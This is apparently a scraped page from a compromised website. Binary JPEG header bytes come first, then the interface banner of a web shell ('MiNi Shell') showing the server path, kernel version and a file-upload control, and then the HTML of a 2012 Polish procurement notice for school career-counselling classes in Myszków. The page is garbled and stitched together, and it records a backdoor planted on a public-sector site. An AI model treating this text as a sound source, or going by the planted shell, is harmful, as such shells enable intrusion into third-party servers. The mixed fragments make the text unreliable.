JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120817/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120817/178651-N-2012.html

<p class="kh_header"><b>Myszków: Przedmiotem zamówienia jest usługa przeprowadzenia zajęć z doradztwa grupowego dla uczniów szkół ponadgimnazjalnych w powiecie myszkowskim w roku szkolnym 2012/2013</b><br>
<b>Numer ogłoszenia: 178651 - 2012; data zamieszczenia: 17.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Myszkowski reprezentowany przez Zarząd Powiatu w Myszkowie , ul. Pułaskiego 6, 42-300 Myszków, woj. śląskie, tel. 034 3159100, faks 034 3159160.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiatmyszkowski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest usługa przeprowadzenia zajęć z doradztwa grupowego dla uczniów szkół ponadgimnazjalnych w powiecie myszkowskim w roku szkolnym 2012/2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest usługa przeprowadzenia zajęć z doradztwa grupowego dla uczniów szkół ponadgimnazjalnych w powiecie myszkowskim w roku szkolnym 2012/2013
Wykaz szkół objętych Programem dla których organem prowadzącym jest Powiat Myszkowski

L.p Nazwa  placówki oświatowej Szkoła ( według typu)

1 Zespół Szkół nr 2 im. H. Kołłątaja w Myszkowie	
Technikum nr 2 
2 Zespół Szkół nr 1 im. E. Kwiatkowskiego w Myszkowie	
Technikum nr 1  3 Zasadnicza Szkoła Zawodowa
4 Zespół Szkół w Żarkach 
Technikum 
Przedmiot zamówienia finansowany jest przez Unię Europejską ze środków Europejskiego Funduszu Społecznego  w ramach projektu pn. Mam zawód - mam pracę w regionie Priorytet IX Działanie 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego Programu Operacyjnego Kapitał Ludzki 2007-2013.
Zamawiający dopuszcza możliwość składania ofert częściowych na wymienione w niniejszej specyfikacji zakresy zamówienia (jeden zakres obejmuje doradztwo w jednej grupie uczniów).
Zakres 1
Usługa grupowego doradztwa zawodowego na rzecz uczniów Technikum nr 2 w Zespole Szkół nr 2 im. H. Kołłątaja w Myszkowie, ul. Pułaskiego 70, 42-300 Myszków w  grupie liczącej maksymalnie 15 osób w godzinach nie pokrywających się z godzinami zajęć lekcyjnych tych uczniów. Doradztwo grupowe będzie się odbywać nie mniej niż 4 razy w tygodniu po 3 godziny lekcyjne w każdym dniu. Zakres zamówienia obejmuje grupowe doradztwo zawodowe na rzecz uczniów w wymiarze 24 godzin lekcyjnych (po 45 minut każda) świadczone w okresie maksymalnie 4 tygodni od dnia rozpoczęcia zajęć z doradztwa grupowego. Przy czym doradztwo grupowe rozpocznie się począwszy od dnia 16.10.2012r. 
Zamawiający dopuszcza możliwość przesunięcia terminu i wydłużenia okresu realizacji  zamówienia.
Zakres 2
Usługa grupowego doradztwa zawodowego na rzecz uczniów Technikum nr 2 w Zespole Szkół nr 2 im. H. Kołłątaja w Myszkowie, ul. Pułaskiego 70, 42-300 Myszków w  grupie liczącej maksymalnie 15 osób w godzinach nie pokrywających się z godzinami zajęć lekcyjnych tych uczniów. Doradztwo grupowe będzie się odbywać nie mniej niż 4 razy w tygodniu po 3 godziny lekcyjne w każdym dniu. Zakres zamówienia obejmuje grupowe doradztwo zawodowe na rzecz uczniów w wymiarze 24 godzin lekcyjnych (po 45 minut każda) świadczone w okresie maksymalnie 4 tygodni od dnia rozpoczęcia zajęć z doradztwa grupowego. Przy czym doradztwo grupowe rozpocznie się począwszy od dnia 16.10.2012r. 
Zamawiający dopuszcza możliwość przesunięcia terminu i wydłużenia okresu realizacji  zamówienia.
Zakres 3
Usługa grupowego doradztwa zawodowego na rzecz uczniów w Zespole Szkół nr 1 im. E. Kwiatkowskiego w Myszkowie, ul. Kwiatkowskiego 18, 42-300 Myszków w  grupie liczącej maksymalnie 30 osób w godzinach nie pokrywających się z godzinami zajęć lekcyjnych tych uczniów. Doradztwo grupowe będzie się odbywać nie mniej niż 4 razy w tygodniu po 3 godziny lekcyjne w każdym dniu. Zakres zamówienia obejmuje grupowe doradztwo zawodowe na rzecz uczniów w wymiarze 24 godzin lekcyjnych (po 45 minut każda) świadczone w okresie maksymalnie 4 tygodni od dnia rozpoczęcia zajęć z doradztwa grupowego. Przy czym doradztwo grupowe rozpocznie się począwszy od dnia 16.10.2012r. 
Zamawiający dopuszcza możliwość przesunięcia terminu i wydłużenia okresu realizacji  zamówienia.
Zakres 4
Usługa grupowego doradztwa zawodowego na rzecz uczniów w Zespole Szkół nr 1 im. E. Kwiatkowskiego w Myszkowie, ul. Kwiatkowskiego 18, 42-300 Myszków w  grupie liczącej maksymalnie 30 osób w godzinach nie pokrywających się z godzinami zajęć lekcyjnych tych uczniów. Doradztwo grupowe będzie się odbywać nie mniej niż 4 razy w tygodniu po 3 godziny lekcyjne w każdym dniu. Zakres zamówienia obejmuje grupowe doradztwo zawodowe na rzecz uczniów w wymiarze 24 godzin lekcyjnych (po 45 minut każda) świadczone w okresie maksymalnie 4 tygodni od dnia rozpoczęcia zajęć z doradztwa grupowego. Przy czym doradztwo grupowe rozpocznie się począwszy od dnia 16.10.2012r. 
Zamawiający dopuszcza możliwość przesunięcia terminu i wydłużenia okresu realizacji  zamówienia.
Zakres 5
Usługa grupowego doradztwa zawodowego na rzecz uczniów w Zespole Szkół nr 1 im. E. Kwiatkowskiego w Myszkowie, ul. Kwiatkowskiego 18, 42-300 Myszków w  grupie liczącej maksymalnie 25 osób w godzinach nie pokrywających się z godzinami zajęć lekcyjnych tych uczniów. Doradztwo grupowe będzie się odbywać nie mniej niż 4 razy w tygodniu po 3 godziny lekcyjne w każdym dniu. Zakres zamówienia obejmuje grupowe doradztwo zawodowe na rzecz uczniów w wymiarze 24 godzin lekcyjnych (po 45 minut każda) świadczone w okresie maksymalnie 4 tygodni od dnia rozpoczęcia zajęć z doradztwa grupowego. Przy czym doradztwo grupowe rozpocznie się począwszy od dnia 16.10.2012r. 
Zamawiający dopuszcza możliwość przesunięcia terminu i wydłużenia okresu realizacji  zamówienia.
Zakres 6
Usługa grupowego doradztwa zawodowego na rzecz uczniów Technikum w Zespole Szkół im. T. Kościuszki w Żarkach, ul. Myszkowska 50, 42-310 Żarki w  grupie liczącej maksymalnie 16 osób w godzinach nie pokrywających się z godzinami zajęć lekcyjnych tych uczniów. Doradztwo grupowe będzie się odbywać nie mniej niż 4 razy w tygodniu po 3 godziny lekcyjne w każdym dniu. Zakres zamówienia obejmuje grupowe doradztwo zawodowe na rzecz uczniów w wymiarze 24 godzin lekcyjnych (po 45 minut każda) świadczone w okresie maksymalnie 4 tygodni od dnia rozpoczęcia zajęć z doradztwa grupowego. Przy czym doradztwo grupowe rozpocznie się począwszy od dnia 16.10.2012r. 
Zamawiający dopuszcza możliwość przesunięcia terminu i wydłużenia okresu realizacji  zamówienia.
Zakres 7
Usługa grupowego doradztwa zawodowego na rzecz uczniów Technikum w Zespole Szkół im. T. Kościuszki w Żarkach, ul. Myszkowska 50, 42-310 Żarki w  grupie liczącej maksymalnie 16 osób w godzinach nie pokrywających się z godzinami zajęć lekcyjnych tych uczniów. Doradztwo grupowe będzie się odbywać nie mniej niż 4 razy w tygodniu po 3 godziny lekcyjne w każdym dniu. Zakres zamówienia obejmuje grupowe doradztwo zawodowe na rzecz uczniów w wymiarze 24 godzin lekcyjnych (po 45 minut każda) świadczone w okresie maksymalnie 4 tygodni od dnia rozpoczęcia zajęć z doradztwa grupowego. Przy czym doradztwo grupowe rozpocznie się począwszy od dnia 16.10.2012r. 
Zamawiający dopuszcza możliwość przesunięcia terminu i wydłużenia okresu realizacji  zamówienia.
2.Informacje dotyczące wszystkich zakresów
Zajęcia z doradztwa grupowego obejmować będą problematykę z zakresu poruszania się po rynku pracy (m.in. zasady pisania CV i listu motywacyjnego, przygotowanie do rozmowy kwalifikacyjnej, gry symulacyjne), podstaw przedsiębiorczości, stereotypów płci, zasad równości, równouprawnienia i przykładów dyskryminacji na rynku pracy. 
Doradztwo grupowe będzie prowadzone w oparciu o materiały dydaktyczne przekazane przez Zamawiającego tj. podręcznik doradcy/ konsultanta zawodowego przygotowany przez Kuratorium Oświaty stanowiący załącznik nr 9 do SIWZ. 
W ramach ostatnich zajęć z doradztwa grupowego konsultant przeprowadzi z uczestnikami ankiety zgodnie ze wzorem przekazanym przez Zamawiającego; wypełnione przez uczestników ankiety Wykonawca przekaże Zamawiającemu.
Wykonawca zobowiązany jest do przedłożenia Zamawiającemu podpisanych przez uczestników list obecności na zajęciach z doradztwa grupowego (wzór listy Zamawiający przekaże Wykonawcy) niezwłocznie po wykonaniu usługi. Listy obecności oraz wypełnione przez uczestników ankiety będą stanowiły podstawę stwierdzenia realizacji zamówienia. 
Do przeprowadzenia zajęć Zamawiający zapewni konsultantowi zawodowemu bezpłatnie sale wykładowe znajdujące się w Zespole Szkół wskazanym w opisie zakresu zamówienia, które Wykonawca będzie realizował. Wykonawca pokrywa koszty dojazdu do sal wykładowych oraz wszelkie inne koszty związane ze świadczeniem usługi w tym wydruki materiałów. 
Przedmiot zamówienia będzie realizowany zgodnie z harmonogramem:
1.W terminie do 5 dni kalendarzowych od podpisania umowy Zamawiający przekaże Wykonawcy:
a)wzór listy obecności na zajęciach z doradztwa grupowego,
b)wzór ankiety uczestnika doradztwa,
2.Na 6 dni kalendarzowych przed rozpoczęciem zajęć w ramach doradztwa grupowego Zamawiający przekaże wykonawcy:
a)imienną listę uczestników doradztwa grupowego,
b)proponowane terminy prowadzenia zajęć z doradztwa grupowego.
3.Na 2 dni kalendarzowe przed rozpoczęciem zajęć w ramach doradztwa grupowego Wykonawca przekaże Zamawiającemu harmonogram zajęć w ramach doradztwa grupowego.
4.Zajęcia w ramach doradztwo grupowego rozpoczną się począwszy od dnia 16.10.2012r. Przy czym, Zamawiający dopuszcza możliwość przesunięcia terminu i wydłużenia okresu realizacji zamówienia w przypadkach określonych w pkt XVI SIWZ.
5.W terminie do 3 dni kalendarzowych od dnia zakończenia zajęć w ramach doradztwa grupowego, Wykonawca przekaże Zamawiającemu:
a)podpisane przez uczniów uczestniczących w zajęciach doradztwa grupowego listy obecności,
b)wypełnione przez uczestników doradztwa grupowego ankiety.  
6.Po wykonaniu zajęć z doradztwa grupowego, zostanie sporządzony protokół odbioru usługi, podpisany przez Wykonawcę i Zamawiającego. Podpisanie bez zastrzeżeń przez obie Strony protokołu odbioru z wykonania usługi jest podstawą do wystawienia faktury/ rachunku za wykonanie usługi.
7.Wykonawca przekaże Zamawiającemu najpóźniej dnia następnego po podpisaniu umowy informacje niezbędne do dokonania zgłoszenia Wykonawcy do ubezpieczenia społecznego. (jeżeli obowiązek taki wynika z przepisów).
3.Do obowiązków Wykonawcy należy :
a) pozostawanie w stałym kontakcie z Zamawiającym ( spotkania odpowiednio do potrzeb, kontakt telefoniczny, e-mailowy );
b) informowanie Zamawiającego o stanie realizacji usługi oraz niezwłoczne, pisemne powiadamianie Zamawiającego o pojawiających się problemach istotnych dla realizacji  usługi;
c) świadczenie usługi w wymiarze godzinowym określonym przez Zamawiającego w   
miarę jego potrzeb, od poniedziałku do piątku  z wyjątkiem dni ustawowo wolnych   
od pracy, w czasie nie pokrywającym się z godzinami zajęć lekcyjnych uczniów 	(przedział godzin: 8:00-19:00).   
W uzasadnionych przypadkach, za zgodą uczestników projektów i po akceptacji 
Zamawiającego, możliwa jest realizacja zajęć w sobotę. Szczegółowy wymiar    
godzinowy oraz terminy realizacji przedmiotu umowy ( harmonogram ) ustalone   
zostaną ze szkolnymi koordynatorami projektu, przy akceptacji Zamawiającego,  
w oparciu o analizę planów lekcji, na 2 dni kalendarzowe przed rozpoczęciem planowanych  zajęć; 
d) realizacja usługi na terenie wskazanych przez Zamawiającego szkoły/szkół z powiatu myszkowskiego ( zgodnie z zapisami SIWZ ) na podstawie przekazanego podręcznika, prowadzenie dokumentacji usług w formie pisanej i fotograficznej;
e)wykorzystywanie wszystkich materiałów i dokumentów przekazanych przez  
Zamawiającego, stosowanie wytycznych w zakresie oznaczania projektów w ramach PO KL i Księgi Identyfikacji  Wizualnej Narodowej Strategii Spójności, umieszczenie na wszystkich materiałach godła Unii Europejskiej  oraz logo  Programu Operacyjnego Kapitał Ludzki oraz informacji o współfinansowaniu materiałów ze środków UE w ramach PO KL (zgodnie z wytycznymi dotyczącymi oznaczenia projektu, dostępnymi na stronie www.efs.gov.pl); f) Wykonawca podda się okresowej kontroli i ocenie realizacji zamówienia, w szczególności w celu zbadania stanu realizacji umowy tj. jej efektywności, rzetelności i jakości oraz prawidłowości prowadzonej dokumentacji 
okołoprojektowej.
4.Zamawiający zastrzega sobie prawo do kontroli i monitoringu pracy Wykonawcy.
5.Z wybranym/i w drodze postępowania Wykonawcą/Wykonawcami Zamawiający zawrze umowę/umowy zgodne z załącznikiem nr 8 do SIWZ (jeden wzór dla wszystkich zakresów) z uwzględnieniem jego/ich formy organizacyjno - prawnej..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 16.10.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie ww. warunku jeżeli Wykonawca przestawi wpis do rejestru podmiotów prowadzących agencje zatrudnienia prowadzonego zgodnie z art. 18 ustawy z dnia 20 kwietnia 2004r. o promocji zatrudnienia i instytucjach rynku pracy (Dz. U. z 2008r. Nr 69, poz. 415 z późn. zm.)-dotyczy podmiotów prowadzących działalność gospodarczą w zakresie świadczenia usługi pośrednictwa pracy, doradztwa personalnego, poradnictwa zawodowego i pracy tymczasowej (warunek dotyczy składania ofert dla któregokolwiek z zakresów nr 1,2,3,4,5,6,7)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie ww. warunku jeżeli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, przeprowadził (usługa zakończona):
-  co najmniej jedną usługę grupowego doradztwa zawodowego w łącznym wymiarze nie mniejszym niż 24 godzin lekcyjnych (1 godzina lekcyjna = 45 minut), polegającą na przeprowadzeniu doradztwa zawodowego w tożsamym zakresie lub w zakresie podobnym do zakresu zamówienia- dotyczy składania ofert dla któregokolwiek z zakresów nr 1,2,3,4,5,6,7
Do wykazu należy dołączyć dokumenty potwierdzające, że wskazane usługi zostały wykonane należycie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie ww. warunku, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował osobami zdolnymi do wykonania zamówienia (co najmniej 1 osoba) a w przypadku osoby fizycznej sam jest zdolny do wykonania zamówienia tj.: 
 W przypadku składania ofert dla któregokolwiek z zakresów nr 1,2,3,4,5,6,7 posiada co najmniej następujące kwalifikacje:
-posiada ukończone studia magisterskie w zakresie doradztwa zawodowego oraz posiada przygotowanie pedagogiczne lub posiada ukończone studia magisterskie na dowolnym kierunku i ukończone studia podyplomowe w zakresie doradztwa zawodowego oraz posiada przygotowanie pedagogiczne, tj. kwalifikacje o których mowa w § 22 ust. 1 rozporządzenia ministra edukacji narodowej z dnia 12 marca 2009 roku w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz.U. 2009 nr 50 poz. 400),
lub
-jest doradcą zawodowym lub doradcą zawodowym I stopnia lub doradcą zawodowym II stopnia w rozumieniu art. 94 ustawy z dnia 20 kwietnia 2004 roku o promocji zatrudnienia i instytucjach rynku pracy (t. j. Dz.U 2008 Nr 69 poz.415 z późn. zm.).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Załącznik nr 3 do SIWZ - Formularz ofertowy
3. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokumenty i oświadczenia, o których mowa:
- w pkt VI.1 SIWZ winny być złożone w taki sposób, aby warunki, o których mowa w pkt V.1 SIWZ Wykonawcy występujący wspólnie spełnili łącznie,
- w pkt VI.2 SIWZ składa odrębnie każdy z Wykonawców występujących wspólnie.
4.Jeżeli Wykonawca polega na wiedzy i doświadczeniu, osobach zdolnych do wykonania zamówienia innych podmiotów, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia. W tym celu Wykonawca winien dołączyć do oferty w szczególności pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia (wzór oświadczenia stanowi załącznik nr 7 do SIWZ).
5.Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów wymienionych w pkt. VI.2.2 SIWZ składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości,
6.Dokumenty, o których mowa w pkt VI.5 SIWZ powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
7.Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt VI.5 SIWZ, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Przepis pkt VI.6 SIWZ stosuje się odpowiednio.
8.Wszystkie dołączone dokumenty, winny być złożone w oryginale lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę.
9.Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski.
6.Jeżeli uprawnienie do podpisania oferty nie wynika z właściwego rejestru lub ewidencji działalności gospodarczej do oferty winno być dołączone stosowne pełnomocnictwo. Pełnomocnictwo powinno być przedstawione w formie oryginału lub kopii poświadczonej notarialnie. 
